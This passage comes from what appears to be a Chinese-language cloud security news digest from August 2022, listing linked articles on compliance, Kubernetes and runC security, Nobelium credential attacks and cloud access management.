https://www.lacework.com/blog/how-fintech-companies-can-protect-consumer-trust-starting-with-the-cloud/
如何自定义您的 PCI 合规框架
https://orca.security/resources/blog/customize-pci-compliance-framework/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年8月30日 16:25火线zone
Nobelium 黑客利用管理员凭证进行攻击
https://sonraisecurity.com/blog/nobelium-hackers-bypass-admin-credentials/
【云攻防系列】从攻击者视角聊聊K8S集群安全(上)
https://xz.aliyun.com/t/11652
KCon议题讲解——进退维谷:runC的阿克琉斯之踵
https://mp.weixin.qq.com/s/YYc0usJUuFwewBEUZ3vC6w
云基础设施授权管理(CIEM)解释
https://www.crowdstrike.com/cybersecurity-101/cloud-security/cloud-infrastructure-entitlement-management-ciem/
2022 年 Equinix 云转型大会:关键要点
https://www.cloudcomputing-news.net/news/2022/aug/25/equinix-cloud-transformation-conference-2022-the-key-takeaways/
限制对你的 RDS 快照的访问
https://kloudle.com/academy/restricting-access-to-your-rds-snapshots
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年8月29日 17:01火线zone
云数据管理能力 (CDMC) 框架:面临的挑战和最佳实践
https://cybersecurity.att.com/blogs/security-essentials/cloud-data-management-capabilities-cdmc-framework-the-challenges-best-practices
利用零信任原则保障 Kubernetes 环境访问安全
https://www.infoq.cn/article/ZjHZmjMXuUwSDubtjEa0
Terraform 与 CloudFormation:哪个更适合您?
https://thenewstack.io/terraform-vs-cloudformation-which-is-better-for-you/
美国陆军表示将在未来一年内取得云迁移及其应用领域突破
https://www.secrss.com/articles/46289
身份治理和管理(IGA):是否足够?
https://sonraisecurity.com/blog/identity-governance-administration/
云安全的 5 大挑战
https://www.scmagazine.com/resource/cloud-security/infographic-5-challenges-for-cloud-security
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information